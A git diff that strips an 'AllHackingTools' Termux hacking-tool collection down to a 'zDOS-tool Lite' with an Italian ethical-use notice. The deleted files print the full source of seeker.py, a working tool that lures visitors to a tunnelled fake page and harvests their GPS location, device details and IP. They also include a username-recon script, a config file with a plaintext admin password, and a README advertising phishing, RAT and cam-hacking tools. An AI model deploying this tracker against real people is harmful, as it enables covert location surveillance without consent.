-echo "1 – исполнение (x)" -echo "" -echo "SSH:" -echo "" -echo "ssh user@host – подключится к host как user" -echo "ssh -p port user@host – подключится к host на порт port как user" -echo "ssh-copy-id user@host – добавить ваш ключ на host для user чтобы включить логин без пароля и по ключам" -echo "" -echo "Search:" -echo "" -echo "grep pattern files – искать pattern в files" -echo "grep -r pattern dir – искать рекурсивно pattern в dir" -echo "command | grep pattern – искать pattern в выводе command" -echo "locate file – найти все файлы с именем file" -echo "" -echo "System Information" -echo "" -echo "date – вывести текущую дату и время" -echo "cal – вывести календарь на текущий месяц" -echo "uptime – показать текущий аптайм" -echo "whoami – имя, под которым вы залогинены" -echo "uname -a – показать информацию о ядре" -echo "cat /proc/cpuinfo – информация ЦПУ" -echo "cat /proc/meminfo – информация о памяти" -echo "man command – показать мануал для command" -echo "df – показать инф. о использовании дисков" -echo "du – вывести “вес” текущего каталога" -echo "free – использование памяти и swap" -echo "whereis app – возможное расположение программы app" -echo "which app – какая app будет запущена по умолчанию" -echo "" -echo "Archive:" -echo "" -echo "tar cf file.tar files – создать tar-архив с именем file.tar содержащий files" -echo "tar xf file.tar – распаковать file.tar" -echo "tar czf file.tar.gz files – создать архив tar с сжатием Gzip" -echo "tar xzf file.tar.gz – распаковать tar с Gzip" -echo "tar cjf file.tar.bz2 – создать архив tar с сжатием Bzip2" -echo "tar xjf file.tar.bz2 – распаковать tar с Bzip2" -echo "gzip file – сжать file и переименовать в file.gz" -echo "gzip -d file.gz – разжать file.gz в file" -echo "" -echo "Network:" -echo "" -echo "ping host – пропинговать host и вывести результат" -echo "whois domain – получить информацию whois для domain" -echo "dig domain – получить DNS информацию domain" -echo "dig -x host – реверсивно искать host" -echo "wget file – скачать file" -echo "wget -c file – продолжить остановленную закачку" -echo "" -echo "Installing packages and working with them" -echo "" -echo "pkg install package - устанавливает package" -echo "pkg remove package - удаляет package" -echo "pkg search package - ищет в репозитории package" -echo "pkg list-installed - выведет список установленных пакетов" -echo "" -echo "installation from source codes:" -echo "" -echo "./configure" -echo "make" -echo "make install" diff --git a/Castom/IMG_20210610_222923.jpg b/Castom/IMG_20210610_222923.jpg deleted file mode 100644 index d00a2292..00000000 Binary files a/Castom/IMG_20210610_222923.jpg and /dev/null differ diff --git a/Castom/ServerStatus.txt b/Castom/ServerStatus.txt deleted file mode 100644 index ef7b7f46..00000000 --- a/Castom/ServerStatus.txt +++ /dev/null @@ -1 +0,0 @@ -online diff --git a/Castom/ServerYesAndNo.txt b/Castom/ServerYesAndNo.txt deleted file mode 100644 index 7ecb56eb..00000000 --- a/Castom/ServerYesAndNo.txt +++ /dev/null @@ -1 +0,0 @@ -no diff --git a/Castom/config.txt b/Castom/config.txt deleted file mode 100644 index 9a48cdd0..00000000 --- a/Castom/config.txt +++ /dev/null @@ -1,5 +0,0 @@ -# Developer : misha korzhik -# config code : 14nY2wpMs82oU49ThI7 - -# user : Administrator -# pass : Adm1_control diff --git a/Castom/ngrok b/Castom/ngrok deleted file mode 100644 index c2be5af7..00000000 Binary files a/Castom/ngrok and /dev/null differ diff --git a/Castom/seeker.py b/Castom/seeker.py deleted file mode 100644 index f3d8823d..00000000 --- a/Castom/seeker.py +++ /dev/null @@ -1,353 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -R = '\033[31m' # red -G = '\033[32m' # green -C = '\033[36m' # cyan -W = '\033[0m' # white - -from shutil import which - -print(G + '[+]' + C + ' Checking Dependencies...' + W) -pkgs = ['python3', 'pip', 'php', 'ssh'] -inst = True -for pkg in pkgs: - present = which(pkg) - if present == None: - print(R + '[-] ' + W + pkg + C + ' is not Installed!') - inst = False - else: - pass -if inst == False: - exit() -else: - pass - -import os -import csv -import sys -import time -import json -import argparse -import requests -import subprocess as subp - -parser = argparse.ArgumentParser() -parser.add_argument('-s', '--subdomain', help='Provide Subdomain for Serveo URL ( Optional )') -parser.add_argument('-k', '--kml', help='Provide KML Filename ( Optional )') -parser.add_argument('-t', '--tunnel', help='Specify Tunnel Mode [ Available : manual ]') -parser.add_argument('-p', '--port', type=int, default=8080, help='Port for Web Server [ Default : 8080 ]') - -args = parser.parse_args() -subdom = args.subdomain -kml_fname = args.kml -tunnel_mode = args.tunnel -port = args.port - -row = [] -info = '' -result = '' -version = '1.2.6 Modded' - -def banner(): - print (G + - r''' - __ - ______ ____ ____ | | __ ____ _______ - / ___/_/ __ \_/ __ \ | |/ /_/ __ \\_ __ \ - \___ \ \ ___/\ ___/ | < \ ___/ | | \/ -/____ > \___ >\___ >|__|_ \ \___ >|__| - \/ \/ \/ \/ \/ ''' + W) - print('\n' + G + '[>]' + C + ' Created By : ' + W + 'thewhiteh4t') - print(G + '[>]' + C + ' Version : ' + W + version + '\n') - -def tunnel_select(): - if tunnel_mode == None: - serveo() - elif tunnel_mode == 'manual': - print(G + '[+]' + C + ' Skipping Serveo, start your own tunnel service manually...' + W + '\n') - else: - print(R + '[+]' + C + ' Invalid Tunnel Mode Selected, Check Help [-h, --help]' + W + '\n') - exit() - -def template_select(): - global site, info, result - print(G + '[+]' + C + ' Select a Template : ' + W + '\n') - - with open('template/templates.json', 'r') as templ: - templ_info = templ.read() - - templ_json = json.loads(templ_info) - - for item in templ_json['templates']: - name = item['name'] - print(G + '[{}]'.format(templ_json['templates'].index(item)) + C + ' {}'.format(name) + W) - - selected = int(input(G + '[>] ' + W)) - - try: - site = templ_json['templates'][selected]['dir_name'] - except IndexError: - print('\n' + R + '[-]' + C + ' Invalid Input!' + W + '\n') - sys.exit() - - print('\n' + G + '[+]' + C + ' Loading {} Template...'.format(templ_json['templates'][selected]['name']) + W) - - module = templ_json['templates'][selected]['module'] - if module == True: - imp_file = templ_json['templates'][selected]['import_file'] - import importlib - importlib.import_module('template.{}'.format(imp_file)) - else: - pass - - info = 'template/{}/php/info.txt'.format(site) - result = 'template/{}/php/result.txt'.format(site) - -def serveo(): - global subdom - flag = False - - print(G + '[+]' + C + ' Checking Serveo Status...', end='') - - try: - time.sleep(1) - rqst = requests.get('https://serveo.net', timeout=5) - sc = rqst.status_code - if sc == 200: - print(C + '[' + G + ' Online ' + C + ']' + W + '\n') - else: - print(C + '[' + R + 'Status : {}'.format(sc) + C + ']' + W + '\n') - exit() - except requests.ConnectionError: - print(C + '[' + R + ' Offline ' + C + ']' + W + '\n') - exit() - - print(G + '[+]' + C + ' Getting Serveo URL...' + W + '\n') - if subdom is None: - with open('logs/serveo.txt', 'w') as tmpfile: - proc = subp.Popen(['ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'ServerAliveInterval=60', '-R', '80:localhost:{}'.format(port), 'serveo.net'], stdout=tmpfile, stderr=tmpfile, stdin=subp.PIPE) - else: - with open('logs/serveo.txt', 'w') as tmpfile: - proc = subp.Popen(['ssh', '-o', 'StrictHostKeyChecking=no', '-o', 'ServerAliveInterval=60', '-R', '{}.serveo.net:80:localhost:{}'.format(subdom, port), 'serveo.net'], stdout=tmpfile, stderr=tmpfile, stdin=subp.PIPE) - - while True: - with open('logs/serveo.txt', 'r') as tmpfile: - try: - stdout = tmpfile.readlines() - if flag == False: - for elem in stdout: - if 'HTTP' in elem: - elem = elem.split(' ') - url = elem[4].strip() - print(G + '[+]' + C + ' URL : ' + W + url + '\n') - flag = True - else: - pass - elif flag == True: - break - except Exception as e: - print(e) - pass - time.sleep(2) - -def server(): - print('\n' + G + '[+]' + C + ' Port : '+ W + str(port)) - print('\n' + G + '[+]' + C + ' Starting PHP Server......' + W, end='') - with open('logs/php.log', 'w') as phplog: - subp.Popen(['php', '-S', '0.0.0.0:{}'.format(port), '-t', 'template/{}/'.format(site)], stdout=phplog, stderr=phplog) - time.sleep(3) - try: - php_rqst = requests.get('http://0.0.0.0:{}/index.html'.format(port)) - php_sc = php_rqst.status_code - if php_sc == 200: - print(C + '[' + G + ' Success ' + C + ']' + W) - else: - print(C + '[' + R + 'Status : {}'.format(php_sc) + C + ']' + W) - except requests.ConnectionError: - print(C + '[' + R + ' Failed ' + C + ']' + W) - Quit() - -def wait(): - printed = False - while True: - time.sleep(2) - size = os.path.getsize(result) - if size == 0 and printed == False: - print('\n' + G + '[+]' + C + ' Waiting for User Interaction...' + W + '\n') - printed = True - if size > 0: - main() - -def main(): - global info, result, row, var_lat, var_lon - try: - row = [] - with open (info, 'r') as file2: - file2 = file2.read() - json3 = json.loads(file2) - for value in json3['dev']: - - var_os = value['os'] - var_platform = value['platform'] - try: - var_cores = value['cores'] - except TypeError: - var_cores = 'Not Available' - var_ram = value['ram'] - var_vendor = value['vendor'] - var_render = value['render'] - var_res = value['wd'] + 'x' + value['ht'] - var_browser = value['browser'] - var_ip = value['ip'] - - row.append(var_os) - row.append(var_platform) - row.append(var_cores) - row.append(var_ram) - row.append(var_vendor) - row.append(var_render) - row.append(var_res) - row.append(var_browser) - row.append(var_ip) - - print(G + '[+]' + C + ' Device Information : ' + W + '\n') - print(G + '[+]' + C + ' OS : ' + W + var_os) - print(G + '[+]' + C + ' Platform : ' + W + var_platform) - print(G + '[+]' + C + ' CPU Cores : ' + W + var_cores) - print(G + '[+]' + C + ' RAM : ' + W + var_ram) - print(G + '[+]' + C + ' GPU Vendor : ' + W + var_vendor) - print(G + '[+]' + C + ' GPU : ' + W + var_render) - print(G + '[+]' + C + ' Resolution : ' + W + var_res) - print(G + '[+]' + C + ' Browser : ' + W + var_browser) - print(G + '[+]' + C + ' Public IP : ' + W + var_ip) - - rqst = requests.get('http://free.ipwhois.io/json/{}'.format(var_ip)) - sc = rqst.status_code - - if sc == 200: - data = rqst.text - data = json.loads(data) - var_continent = str(data['continent']) - var_country = str(data['country']) - var_region = str(data['region']) - var_city = str(data['city']) - var_org = str(data['org']) - var_isp = str(data['isp']) - - row.append(var_continent) - row.append(var_country) - row.append(var_region) - row.append(var_city) - row.append(var_org) - row.append(var_isp) - - print(G + '[+]' + C + ' Continent : ' + W + var_continent) - print(G + '[+]' + C + ' Country : ' + W + var_country) - print(G + '[+]' + C + ' Region : ' + W + var_region) - print(G + '[+]' + C + ' City : ' + W + var_city) - print(G + '[+]' + C + ' Org : ' + W + var_org) - print(G + '[+]' + C + ' ISP : ' + W + var_isp) - except ValueError: - pass - - try: - with open (result, 'r') as file: - file = file.read() - json2 = json.loads(file) - for value in json2['info']: - var_lat = value['lat'] + ' deg' - var_lon = value['lon'] + ' deg' - var_acc = value['acc'] + ' m' - - var_alt = value['alt'] - if var_alt == '': - var_alt = 'Not Available' - else: - var_alt == value['alt'] + ' m' - - var_dir = value['dir'] - if var_dir == '': - var_dir = 'Not Available' - else: - var_dir = value['dir'] + ' deg' - - var_spd = value['spd'] - if var_spd == '': - var_spd = 'Not Available' - else: - var_spd = value['spd'] + ' m/s' - - row.append(var_lat) - row.append(var_lon) - row.append(var_acc) - row.append(var_alt) - row.append(var_dir) - row.append(var_spd) - - print ('\n' + G + '[+]' + C + ' Location Information : ' + W + '\n') - print (G + '[+]' + C + ' Latitude : ' + W + var_lat) - print (G + '[+]' + C + ' Longitude : ' + W + var_lon) - print (G + '[+]' + C + ' Accuracy : ' + W + var_acc) - print (G + '[+]' + C + ' Altitude : ' + W + var_alt) - print (G + '[+]' + C + ' Direction : ' + W + var_dir) - print (G + '[+]' + C + ' Speed : ' + W + var_spd) - except ValueError: - error = file - print ('\n' + R + '[-] ' + W + error) - repeat() - - print ('\n' + G + '[+]' + C + ' Google Maps.................: ' + W + 'https://www.google.com/maps/place/' + var_lat.strip(' deg') + '+' + var_lon.strip(' deg')) - - if kml_fname is not None: - kmlout(var_lat, var_lon) - - csvout() - repeat() - -def kmlout(var_lat, var_lon): - with open('template/sample.kml', 'r') as kml_sample: - kml_sample_data = kml_sample.read() - - kml_sample_data = kml_sample_data.replace('LONGITUDE', var_lon.strip(' deg')) - kml_sample_data = kml_sample_data.replace('LATITUDE', var_lat.strip(' deg')) - - with open('{}.kml'.format(kml_fname), 'w') as kml_gen: - kml_gen.write(kml_sample_data) - - print(G + '[+]' + C + ' KML File Generated..........: ' + W + os.getcwd() + '/{}.kml'.format(kml_fname)) - -def csvout(): - global row - with open('db/results.csv', 'a') as csvfile: - writer = csv.writer(csvfile) - writer.writerow(row) - print(G + '[+]' + C + ' New Entry Added in Database.: ' + W + os.getcwd() + '/db/results.csv') - -def clear(): - global result - with open (result, 'w+'): pass - with open (info, 'w+'): pass - -def repeat(): - clear() - wait() - main() - -def Quit(): - global result - with open (result, 'w+'): pass - os.system('pkill php') - exit() - -try: - banner() - tunnel_select() - template_select() - server() - wait() - main() - -except KeyboardInterrupt: - print ('\n' + R + '[!]' + C + ' Keyboard Interrupt.' + W) - Quit() diff --git a/Castom/system.txt b/Castom/system.txt deleted file mode 100644 index d0064c3d..00000000 --- a/Castom/system.txt +++ /dev/null @@ -1 +0,0 @@ -QruWn diff --git a/Castom/systemfile.txt b/Castom/systemfile.txt deleted file mode 100644 index 0d874b00..00000000 --- a/Castom/systemfile.txt +++ /dev/null @@ -1 +0,0 @@ -WJins82bsOx diff --git a/Castom/userrecon.sh b/Castom/userrecon.sh deleted file mode 100644 index 6719191a..00000000 --- a/Castom/userrecon.sh +++ /dev/null @@ -1,142 +0,0 @@ -trap 'printf "\n";partial;exit 1' 2 - -banner() { - - - -printf " \e[1;92m.-\"\"\"\"-. \e[0m\n" -printf " \e[1;92m/ \ \e[0m\n" -printf "\e[1;77m _ _ ____ \e[0m\e[1;92m/_ _\ \e[0m\n" -printf "\e[1;77m | | | |___ ___ _ __| _ \ ___ ___ ___ _ __ \e[0m\e[1;92m// \ / \\ \e[0m\n" -printf "\e[1;77m | | | / __|/ _ \ '__| |_) / _ \/ __/ _ \| '_ \ \e[0m\e[1;92m|\__\ /__/| \e[0m\n" -printf "\e[1;77m | |_| \__ \ __/ | | _ < __/ (_| (_) | | | | \e[0m\e[1;92m\ || / \e[0m\n" -printf "\e[1;77m \___/|___/\___|_| |_| \_\___|\___\___/|_| |_| \e[0m\e[1;92m\ / \e[0m\n" -printf " \e[1;92mv1.0, Author: NONE \e[0m \e[1;92m\ __ / \e[0m\n" -printf " \e[1;92m'.__.' \e[0m\n" - - - -} - -partial() { - -if [[ -e $username.txt ]]; then -printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Saved:\e[0m\e[1;77m %s.txt\n" $username -fi - - -} - -scanner() { - -read -p $'\e[1;92m[\e[0m\e[1;77m?\e[0m\e[1;92m] Input Username:\e[0m ' username - -if [[ -e $username.txt ]]; then -printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Removing previous file:\e[0m\e[1;77m %s.txt" $username -rm -rf $username.txt -fi -printf "\n" -printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Checking username\e[0m\e[1;77m %s\e[0m\e[1;92m on: \e[0m\n" $username - -## INSTAGRAM - -check_insta=$(curl -s -H "Accept-Language: en" "https://www.instagram.com/$username" -L | grep -o 'The link you followed may be broken'; echo $?) -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] Instagram: \e[0m" - -if [[ $check_insta == *'1'* ]]; then -printf "\e[1;92m Found!\e[0m https://www.instagram.com/%s\n" $username -printf "https://www.instagram.com/%s\n" $username > $username.txt -elif [[ $check_insta == *'0'* ]]; then -printf "\e[1;93mNot Found!\e[0m\n" -fi - -## Facebook - -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] Facebook: \e[0m" -check_face=$(curl -s "https://www.facebook.com/$username" -L -H "Accept-Language: en" | grep -o 'not found'; echo $?) - - -if [[ $check_face == *'1'* ]]; then -printf "\e[1;92m Found!\e[0m https://www.facebook.com/%s\n" $username -printf "https://www.facebook.com/%s\n" $username >> $username.txt -elif [[ $check_face == *'0'* ]]; then -printf "\e[1;93mNot Found!\e[0m\n" -fi - -## TWITTER - -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] Twitter: \e[0m" -check_twitter=$(curl -s "https://www.twitter.com/$username" -L -H "Accept-Language: en" | grep -o 'page doesn’t exist'; echo $?) - - -if [[ $check_twitter == *'1'* ]]; then -printf "\e[1;92m Found!\e[0m https://www.twitter.com/%s\n" $username -printf "https://www.twitter.com/%s\n" $username >> $username.txt -elif [[ $check_twitter == *'0'* ]]; then -printf "\e[1;93mNot Found!\e[0m\n" -fi - -## YOUTUBE - -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] YouTube: \e[0m" -check_youtube=$(curl -s "https://www.youtube.com/$username" -L -H "Accept-Language: en" | grep -o 'Not Found'; echo $?) - - -if [[ $check_youtube == *'1'* ]]; then -printf "\e[1;92m Found!\e[0m https://www.youtube.com/%s\n" $username -printf "https://www.youtube.com/%s\n" $username >> $username.txt -elif [[ $check_youtube == *'0'* ]]; then -printf "\e[1;93mNot Found!\e[0m\n" -fi - -## BLOGGER - -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] Blogger: \e[0m" -check=$(curl -s "https://$username.blogspot.com" -L -H "Accept-Language: en" -i | grep -o 'HTTP/2 404'; echo $?) - - -if [[ $check == *'1'* ]]; then -printf "\e[1;92m Found!\e[0m https://%s.blogspot.com\n" $username -printf "https://%s.blogspot.com\n" $username >> $username.txt -elif [[ $check == *'0'* ]]; then -printf "\e[1;93mNot Found!\e[0m\n" -fi - -## GLOOGLE PLUS - -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] GooglePlus: \e[0m" -check=$(curl -s "https://plus.google.com/+$username/posts" -L -H "Accept-Language: en" -i | grep -o 'HTTP/2 404' ; echo $?) - - -if [[ $check == *'1'* ]]; then -printf "\e[1;92m Found!\e[0m https://plus.google.com/+%s/posts\n" $username -printf "https://plus.google.com/+%s/posts\n" $username >> $username -elif [[ $check == *'0'* ]]; then -printf "\e[1;93mNot Found!\e[0m\n" -fi - -## REDDIT - -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] Reddit: \e[0m" -check1=$(curl -s -i "https://www.reddit.com/user/$username" -H "Accept-Language: en" -L --user-agent '"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"' | head -n1 | grep -o 'HTTP/2 404' ; echo $?) - -if [[ $check1 == *'0'* ]] ; then -printf "\e[1;93mNot Found!\e[0m\n" -elif [[ $check1 == *'1'* ]]; then - -printf "\e[1;92m Found!\e[0m https://www.reddit.com/user/%s\n" $username -printf "https://www.reddit.com/user/%s\n" $username >> $username.txt -fi - -## WORDPRESS - -printf "\e[1;77m[\e[0m\e[1;92m+\e[0m\e[1;77m] Wordpress: \e[0m" -check1=$(curl -s -i "https://$username.wordpress.com" -H "Accept-Language: en" -L --user-agent '"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"' | grep -o 'Do you want to register' ; echo $?) - -if [[ $check1 == *'0'* ]] ; then -printf "\e[1;93mNot Found!\e[0m\n" -elif [[ $check1 == *'1'* ]]; then - -printf "\e[1;92m Found!\e[0m https://%s.wordpress.com\n" $username -printf "https://%s.wordpress.com\n" $username >> $username.txt -fi diff --git a/Castom/version.txt b/Castom/version.txt deleted file mode 100644 index dbe59006..00000000 --- a/Castom/version.txt +++ /dev/null @@ -1 +0,0 @@ -2.8.1 diff --git a/LEGAL.md b/LEGAL.md new file mode 100644 index 00000000..e8a54072 --- /dev/null +++ b/LEGAL.md @@ -0,0 +1,35 @@ +# LEGAL.md + +## Uso etico e responsabilità + +Questo progetto, **zDOS-tool Lite**, è distribuito esclusivamente per scopi **educativi, di ricerca e di test**. +Non deve essere utilizzato per attività non autorizzate, dannose o illegali. + +--- + +## Divieti espliciti +È vietato utilizzare questo software per: +- Attacchi DDoS, phishing o intrusioni non autorizzate +- Raccolta di dati personali senza consenso +- Diffusione di malware o exploit +- Qualsiasi attività che violi leggi locali, nazionali o internazionali + +--- + +## Limitazioni di responsabilità +Gli autori e i contributori: +- **Non si assumono alcuna responsabilità** per l’uso improprio del software +- Non garantiscono che il codice sia privo di bug o vulnerabilità +- Non sono responsabili di eventuali danni diretti o indiretti derivanti dall’uso del progetto + +--- + +## Licenza +Il progetto è distribuito sotto licenza **GPL-3.0**. +Consulta il file [LICENSE](LICENSE) per i dettagli completi. + +--- + +## Linee guida per i contributori +Chi contribuisce al progetto deve: +- Mantenere la diff --git a/README.md b/README.md index 75bae57f..eac97f3f 100644 --- a/README.md +++ b/README.md @@ -1,461 +1,24 @@ - +# zDOS-tool Lite -

- - - - - - -

- -

-• License -• Issues -• Project -• Wikipedia • - -

- -> AllHackingTools: is a system designed to automate the download process and install various tools for penetration testing. - ---------------------- - -#### Hi, if you want to set up a termux quickly, here you are! More Hacking tools with one tool! - -> I am not responsible for your actions. By downloading software from this repository, you agree to the [license](https://github.com/mishakorzik/AllHackingTools/blob/main/LICENSE). - ---------- -## Supported systems -#### will download 5-20 minutes - - - -**Here on these systems works AllHackingTools**
-## Tool tested on: - - - ------------------------------- -> If you do not understand anything then there is a [translate](#Translate). - -## New features: - -**1) New Tools And functions** -- New tools for penetration testing. And many new opportunities. - -**2) Castomization and desing** -- Now a new customization for the terminal has been added, and a new design has been added. - -**3) New Desing And functions** -- The AllHackingTools installer has been updated it has got a new design and many features to check packages. - -**4) New design for download and update** -- Now added the ability to quickly update AllHackingTools and new design, download, and update AllHackingTools. - -**5) Fixed More Bugs** -- Fixed many bugs in the system, now AllHackingTools works faster and more stable - -**6) Run Tools** -- The user can now run the tools directly from AllHackingTools, even though they are already installed. - -**7) Restart AllHackingTools** -- And when you run a tool and exit it, AllHackingTools automatically restarts. +Una versione **leggera e ripulita** del toolkit originale `zDOS-tool`, pensata per Termux e ambienti Linux minimali. +Obiettivo: fornire solo gli strumenti essenziali, con installazione rapida e dipendenze ridotte. --- - -## Installing - -``` -#Upgrade all & full packages -apt update -apt upgrade - -#Add your termux permision -termux-setup-storage - -#Install package git -apt install git - -#clone this repository -git clone https://github.com/mishakorzik/AllHackingTools - -#cd to directory allhackingtools -cd AllHackingTools - -#Start script to install system -bash Install.sh -``` - -**if the error and the command does not work: cd AllHackingTools && bash fix.sh** - -**And when he writes a big rainbow button: -Done, everything is ready! Wait until you can write to the terminal.** - -```bash -#configure ngrok -ngrok authtoken <↖️sеlеct free authtoken> - -#start ngrok -ngrok http 80 -``` - - -#### Run command to start AllHackingTools: msdconsole -## AllHackingTool Menu: -- Information Gathering -- Exploitation Tools -- Sniffing and Spoofing -- Web Attack Tools -- Cam Hacking Tools -- Remote Trojan RAT -- SQL Injection Tools -- SocialMedia Bruteforce - - SocialMedia Finder -- DDOS Attack Tools -- Phishing Attack Tools -- Hash Cracking Tools -- Worldlist Generator -- XSS Attack Tools -- Discord Leaks -- Telegram Info -- Web Crawling -- Wireless attack Tools -- Other Tools - - Free Proxy - - Mix Tools - -
- New Commands - -##### AllHackingTools adds new commands for the terminal! All commands below - -```bash -msdconsole : start AllHackingTools -msdServer : Check AllHackingTools server -msdc : start AllHackingTools -Theme : Select Termux Theme -Standart : Select default keys -edit : Select nano keys - -Others commands: - -system : View My System -sys : View My System - -Fonts Commands: - -figlet -f puffy AND toilet -f puffy -figlet -f poison AND toilet -f poison -figlet -f avatar AND toilet -f avatar -figlet -f modular AND toilet -f modular -figlet -f crazy AND toilet -f crazy -figlet -f bloody AND toilet -f bloody -figlet -f rusto AND toilet -f rusto -figlet -f real AND toilet -f real -figlet -f pagga AND toilet -f pagga -figlet -f block AND toilet -f block -``` -- [x] system desing -- [x] Mix Tools -- [x] technical support -- [x] In a real break-in -- [x] multi terminal -- [x] terminal customization -- [x] selection of editions -- [x] multifunctional settings -- [ ] fast download i system -- [ ] Automatic - -
- -
- qiq more commands - -##### Now when you write the qiq command in the terminal. Many other teams will show you -##### The main commands should be written without a space, with a drawing, for example: qiq-install -##### When you write qiq-install, it will write to you Enter module name to install and write the name of the module you want to download, for example: git, python, wget - -``` ->>> qiq-help :view more qiq info ->>> qiq-update :update qiq ->>> qiq-version :view qiq version ->>> qiq-author :view qiq author ->>> qiq-install :install packages ->>> qiq-remove :remove packages ->>> qiq-reinstall :reinstall packages -┐─┐┐ ┬┐─┐┌┐┐┬─┐┌┌┐ ┌─┐┌─┐┌┌┐┌┌┐┬─┐┌┐┐┬─┐┐─┐ -└─┐└┌┘└─┐ │ ├─ │││ │ │ ││││││││─┤││││ │└─┐ -──┘ ┆ ──┘ ┆ ┴─┘┘ ┆ └─┘┘─┘┘ ┆┘ ┆┘ ┆┆└┘┆─┘──┘ ->>> qiq-proces :view system process ->>> qiq-smalltext :create small logo ->>> qiq-bigtext :create big logo ->>> qiq-rgb :create medium colored logo ->>> qiq-rcolor :create medium rainbow logo ->>> qiq-mysystem :view my system ->>> qiq-home :cd to derictory ->>> qiq-usr :cd to derictory ->>> qiq-bin :cd to derictory -┬─┐o┌─┐┬ ┬─┐┌┐┐ ┌┐┐┬─┐┐ ┬ ┌─┐┌─┐┌┌┐┌┌┐┬─┐┌┐┐┬─┐┐─┐ -├─ ││ ┬│ ├─ │ │││├─ │││ │ │ ││││││││─┤││││ │└─┐ -┆ ┆┆─┘┆─┘┴─┘ ┆ ┆└┘┴─┘└┴┆ └─┘┘─┘┘ ┆┘ ┆┘ ┆┆└┘┆─┘──┘ ->>> figlet -f Puffy :no description ->>> figlet -f Bloody :no description ->>> figlet -f Poison :no description ->>> figlet -f Block :no description ->>> figlet -f Avatar :no description ->>> figlet -f Crazy :no description ->>> figlet -f Modular :no description ->>> figlet -f Basic :no description ->>> figlet -f Rusto :no description ->>> figlet -f Pagga :no description -┌─┐┌┐┐┬ ┬┬─┐┬─┐ ┌─┐┌─┐┌┌┐┌┌┐┬─┐┌┐┐┬─┐┐─┐ -│ │ │ │─┤├─ │┬┘ │ │ ││││││││─┤││││ │└─┐ -┘─┘ ┆ ┆ ┴┴─┘┆└┘ └─┘┘─┘┘ ┆┘ ┆┘ ┆┆└┘┆─┘──┘ ->>> qiq-AllHackingTools :Install AllHackingTools ->>> qiq-FreeProxy :Install Free-Proxy ->>> qiq-AdminHack :Install AdminHack -``` -
- - ----- -#### When prompted for the download type: Default/Coded - -> **Choose which installation is more convenient for you** - -> **If you can't download Default then choose: Coded** - -> **It is recommended to choose: Default** ----------- - -
- Need Help - -#### Do you need help? Write me on: developer.mishakorzhik@gmail.com -#### And I will consider your letter and problem! - -```bash -Emails: - developer.mishakorzhik@gmail.com - -Developers: - mishakorzhik -``` - -## Bug? -If the tool fails, follow these steps: - -1. Take a screenshot and see the error - in detail - -2. Contact me through the following - email: developer.mishakorzhik@gmail.com - -3. Submit the screenshot and explain - your problem with that error -
- -
- Versions - -### Version 2.6.3 -##### below is a list added in version 2.6 - -``` - -Desing: - Many bugs have been fixed - -Tools: - Added new tools! - -#Thanks for reviewing the update list. -#Bye bye Have a nice day! -``` - -### Version 2.5.1 -##### below is a list added in version 2.5 - -``` - -Desing: - Many bugs have been fixed - Added New Castomization - New Loading animation - Added checking for ping - -Build: - Added new optimization - Added stabilization - Added new programming code PHP - -#Thanks for reviewing the update list. -#Bye bye Have a nice day! -``` - - -### Version 2.4 -##### below is a list added in version 2.4 - -``` - -Tools: - Many new utilities have been added - -Desing: - Many bugs have been fixed - Added New Castomization - Added Castomization for loading - -#Thanks for reviewing the update list. -#Bye bye Have a nice day! -``` - -### Version 2.3 -##### below is a list added in version 2.3 - -``` - -Tools: - Many new utilities have been added - -Desing: - Many bugs have been fixed - Added New Commands - Added New Castomization - -#Thanks for reviewing the update list. -#Bye bye Have a nice day! -``` - -### Version 2.2 -##### below is a list added in version 2.2 - -```bash - -Tools: - Many new utilities have been added - -Desing: - Many bugs have been fixed - New logo designs were added - New Menu desings were added - New AllHackingTools download design - -#Thanks for reviewing the update list. -#Bye bye Have a nice day! -``` - -### Version 2.1 -##### below is a list added in version 2.1 - -```bash - -Tools: - Two new menu options have been added - Many new utilities have been added - -Desing: - Many bugs have been fixed - Two new logo designs were added - -#Thanks for reviewing the update list. -#Bye bye Have a nice day! -``` -[![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/)

-
- - - -## Dependencies -#### If all this is then you can download! - -**Root : NO ROOT**
-**Storage : 2200 MB**
-**Internet : must be**
- -#### Okay let's go installing! If it shows Are you rooted? Then ignore it! ---------- -## What does it download? - -* `git` `python` -* `wget` `curl` -* `openssh` `php` -* `toilet` `colorama` -* `jq` `apache2` -* `ruby` `ssl` -* `w3m` `figlet` -* `zip` `lolcat` -* `pv` `neofetch` -* `zsh` `ngrok` - -#### And more packages! ------- -## Donate - -**If you want to donate, click on the button** - +## ✨ Caratteristiche principali +- ✅ Dipendenze minime: `git`, `python`, `curl`, `openssh`, `figlet`, `toilet` +- ✅ Menu semplificato con pochi moduli utili +- ✅ Installazione < 5 minuti +- ✅ Storage ridotto (<500 MB) +- ✅ Compatibilità alta con Termux +- ✅ Uso etico e conforme (vedi [LEGAL.md](LEGAL.md)) --- -## Screenshot -#### view a screenshot for AllHackingTools -
-

- - - - -

